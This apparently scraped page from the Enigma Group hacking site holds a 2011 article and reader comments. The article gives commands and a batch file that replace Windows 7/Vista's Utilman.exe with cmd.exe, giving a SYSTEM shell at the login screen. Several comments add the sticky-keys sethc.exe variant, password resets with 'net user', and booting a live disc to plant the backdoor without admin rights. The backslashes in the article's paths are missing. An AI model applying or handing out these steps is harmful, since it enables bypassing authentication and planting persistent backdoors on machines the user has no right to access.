EG Information
Training Missions
Knowledge Bank
Pimp Us Out!
Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.
|
| |
Affiliates
|
|
Enigma Group's Articles
Return to Category Selection
Windows 7 and Vista Backdoor - Submitted By: Phast 2011-04-08 09:42:36
If you have any experience with Windows 7 or Vista, you will know that the Administrators account is disabled by default. In XP, a simple backdoor was procured by hitting Ctrl-alt-delete twice at the login screen, to bring you to a proper login prompt, and logging into an unprotected Administrator account. Because this is not possible in Windows 7 or Vista, I looked for a different way to get in.
When you come to the login screen for Windows 7, there are three doors that lead to different situations:
The user account: typically brings you to a password prompt if it is clicked, and the account has been password protected. Nothing here...
The shutdown button: Gives you the option to restart, shutdown, or put your computer to sleep. Another dead end...
The Ease Of Access button: Gives you multiple options to improve the usability of Windows 7 or Vista. These options have to be stored somewhere in the WINDOWS folder...lets go take a peek.
After a little research, I found that the executable that the Ease Of Access option executes is called "Utilman.exe" in the system32 folder of WINDOWS.
Light bulb moment.
What if we replaced that utility with a command prompt?
So, I tried to replace it with a different executable. Unfortunately, I could not change its name, or delete it- it was locked. I tried using my favorite unlocking utility, Unlocker, but that program is not compatible with Windows 7. So I researched online for a better way to unlock it. I found a proper command line argument that allowed me to take ownership of the file, and voila! An unlocked Utilman.exe file.
Here are the steps to making the backdoor:
1. Take full ownership of the Utilman.exe file.
takeown /f "c:windowssystem32Utilman.exe
2. Modify the Access Control List that controls this file, and grant us full administrators access to the file.
icacls "c:windowssystem32Utilman.exe" /grant administrators:F
3. Rename the Utilman.exe file, so that it is not called by Windows at any time.
rename c:windowssystem32Utilman.exe Utilman2.exe
4. Copy the command line executable in the same folder, and rename it to something generic, so that it doesn't interfere with the original command line executable. I used cmd5.exe.
copy c:windowssystem32cmd.exe c:windowssystem32cmd5.exe
5. Rename the copied command line executable to Utilman.exe, thus substituting the command prompt for the Ease of Access utility.
rename c:windowssystem32cmd5.exe Utilman.exe
And you're done! Make sure you run all of these commands as administrator by right-clicking the command prompt file and selecting "Run as Administrator".
I took the liberty of writing a batch file that, when run as admin, performs all of these steps in a blink of an eye. To create your own, simply open a .txt file with notepad, copy these commands into the file:
takeown /f "c:windowssystem32Utilman.exe
icacls "c:windowssystem32Utilman.exe" /grant administrators:F
rename c:windowssystem32Utilman.exe Utilman2.exe
copy c:windowssystem32cmd.exe c:windowssystem32cmd5.exe
rename c:windowssystem32cmd5.exe Utilman.exe
Save as:
<whatever you want here>.bat
Right click, "Run as Administrator".
To test to see if it works, reboot your computer, and when it comes to the login screen, instead of logging in, click on the Ease of Access button. It should present you with a command shell with SYSTEM privileges.
Return to Category Selection
Comment By: Phast 2011-04-11 21:14:40
For some reason it removed my forward slashes in the commands. If you are at all familiar with the structure of the commands, replace them at your own discretion in your batch files.
Comment By: Ryuske 2011-04-12 21:36:38
So this isn't exactly a backdoor. As in-order to do this, you must already have admin rights.
Unless I missed something?
Comment By: Phast 2011-04-15 09:58:14
Depends on what you want to call a backdoor. I was under the assumption that a backdoor was an opening left by an attacker once a system was breached. If you have access to a computer with the proper operating system, you can install this "backdoor" to gain access to the system if you have been locked out.
Comment By: dnatrixene135 2011-07-11 14:49:22
It's more like a "just-in-case" type of login. Actually in XP sometimes the admin account is password protected.
Comment By: niteshade 2011-08-07 21:17:48
i assume that the reason why you didn't include directory
seperators in the windows paths was a countermeasure against
skids, right? Great hack.
Comment By: Phast 2011-08-13 10:29:53
Heh don't give me that much credit. The submitter removed my directory separators, as you can see by my first comment. At first I thought that was a bad thing, but now I view it in a different light, thanks to you.
Also, you can use this hack to not only enable the typically disabled administrator account on Windows 7, but also CREATE a user, and ADD him to the local administrators group, and pwn from there.
I had to do that just the other day, when some smartass enabled the administrators account (the proper way), put a password on it, then disabled it again.
Comment By: dustinr1985 2011-09-26 09:11:57
you did miss something here if you know the user name of the computer you can use net user *username* *whateverpassword* you want and change their password hince the backdoor part
ex: net user user1 newpass
user1's password will now be newpass
you can also take ownership of the shiftkeys file thats stored in sys32 folder delete it and copy cmd rename it as the shiftkeys orginal name and then at the login just hit shift 5 times and you get a command prompt.
im SURE this has been addressed in some place here on this website before however if this comment needs to be removed feel free to take it down
Comment By: Phast 2011-11-11 09:21:08
I actually like the shift keys idea better. Little less obvious than an ease of access that pulls up a weird command line for no reason.
Comment By: vict0r 2012-01-18 15:45:08
Utilman.exe & Sethc.exe ( for sticky keys ) both are useful for backdoor purpose
Methodology
===========
1.Boot your machine with live ubuntu or open source
2. mount the system drive if not mounted to see the WINDOWS/System32 directory
3. Go and replace Utilman.exe with cmd.exe [ Don't forget to take backup of Utilman.exe ]
OR
copy sethc.exe cmd.exe [enter]
4. Reboot machine and press shift thrice n voila cmd would be there to welcome you.
5. Use the command
net user [username] [password] [enter]
to reset the password. for example
net user Administrator P@ssword12#
by: vict0r
If you wish to submit a comment, you must be a registered member and logged in. Login or Register.
Return to Category Selection
|
| |
|
|
Who Visited EnigmaGroup Today?
1400 Guests, 223 Users (217 Spiders)
mjneat, TheCheeseDemon, famous0123, Galagatron, sickmind, cat1vo, dark_void, CJ_Omaha, plex, tgm001, Edika, junaid_junaid59, JohnJohnJohn, ssmaslov, psychomarine, Dregoon, Patrickk, Aska, Beat_Slayer, M0rdak, Ausome1, Imre, rockcraft, Vreality2007, mmndglxuwn, m0rt, unholyblood, iterrumzz, VurbTrurb, Mayonoula, MAMWOURBROR, mutabor, gobinda, cossyDrybrich, Razin, zaCruBumas8, hunja, johny34, pantoufle, bagy, arctica, hackarchives, UsedDeteKef, Peculator, Fadhilat606, TheTrueMonarch, Pascall01, hackaday, Tjm, arndevil, flairvelocity, lol, alphbond, kdivanov, elizbethallis6, Rik, bn11, BorgBot, SHASHANK101hello, 4poc4lyptic, ksajxai, nbmorri1, electro-technic, saraf, شمالي عرعر, lamb, AutobotPrime, Underleaf, The End, tomtombomb, killobyte, snowgirlx, so_saucey, zerolife, Althor, Cramps, Hekser, Hyperborn, cyber-guard, jhgrunn, cobra, Partisan, MAZI_, cyborg, GenbreedX, moel77, cliptoX, pwnpwnlolz, letshavepie, Mrwormz, yshiau, mirmo, roozyoppomo, soft_devil, cls777, scoobywan, Reiversed, joshua, st3alth, Afrika, PaiffDryday, venter, Anthony12796, sh3llcod3, 8FIGURE, Rannim, Evil1, maloaboy, BACanON, SlayingDragons, Repuhlsive, IvanDimitriev, lolzsec, 1RiB, mzungudo, Micro_Geek, iMaxx, aciboummamymn, k0unterkulcher, somebody777, m14m16, GoododotAlcob, negasora, Rastii, UninueMem, Swifsolja, ad.conquest, ngolatkar, Infinity8, Jigoku, thesupervisor, p0is0n5ting, kernel_mod, AKL, GothicLogic, themastersinner, dnatrixene135, ChewBigRed, kalak55, sejem, cve916, pollolololo, triecturn, Violatedsmurf, Ops, jmp, xsiemich, generalisimo, strudels, ga3ttpom, KingOfBritains, epoch_qwert, suten, FriskyKat, Ryuske, Adonis Achilles, ubqbcdzzhf, 3vil, Nightraven, US£RNAM£, Weindittewcon, Batesheelocot, GSmyrlis, MaxMeier, Elite.America, rabbidmind, Psiber_Syn, phoenix22, imittyerrotte, peewster, cyberturtle, ctb, dexgeda, sdw, Pizza, White_widdow, devarian, finesse, Nature112091777, Danc7171, Alphadragon, Estadagause, 53QR10U5, Xargos, Alkomage, hardlock, Barry Gonzoles, MineDweller, Gkjt, N4g4c3N, [I]nfectedbug, wimsteege, aqr5zdcw, xin214, Bugshuppy, SnoopSky, Hessesian, voodooKobra, sKcarr, IROverRated, W1F1G3NJU75U, Baddy, ziadmosaan, gamble86, realzs, CruelDemon, Shinju, aVoid, aquiredanonymity, kukumumu, web_request, callmeneon, KissMyDAFFODIL, Feld Grau, Abhinav2107, prabhataditya, mbuyiselo, shumer, phenom216, princennamdi, huskyboiza, ninety-nine, lucca65 |
| |
|
|
|
|
|
